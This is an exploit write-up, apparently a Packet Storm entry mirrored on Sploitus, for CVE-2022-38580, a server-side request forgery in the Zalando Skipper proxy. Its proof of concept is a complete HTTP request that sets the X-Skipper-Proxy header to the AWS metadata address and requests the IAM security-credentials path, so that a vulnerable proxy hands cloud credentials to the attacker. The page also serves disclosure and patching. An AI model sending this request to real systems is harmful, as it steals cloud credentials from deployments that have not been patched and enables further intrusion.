Share
## https://sploitus.com/exploit?id=PACKETSTORM:171546
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)  
#Date: 24/10/2022  
#Exploit Author: Hosein Vita & Milad Fadavvi  
#Vendor Homepage: https://github.com/zalando/skipper  
#Software Link: https://github.com/zalando/skipper  
#Version: < v0.13.237  
#Tested on: Linux  
#CVE: CVE-2022-38580  
  
  
Summary:  
  
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.  
  
  
Proof Of Concept:  
  
1- Add header "X-Skipper-Proxy" to your request  
2- Add the aws metadata to the path  
  
GET /latest/meta-data/iam/security-credentials HTTP/1.1  
Host: yourskipperdomain.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36  
X-Skipper-Proxy: http://169.254.169.254  
Connection: close  
  
  
  
  
Reference:  
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2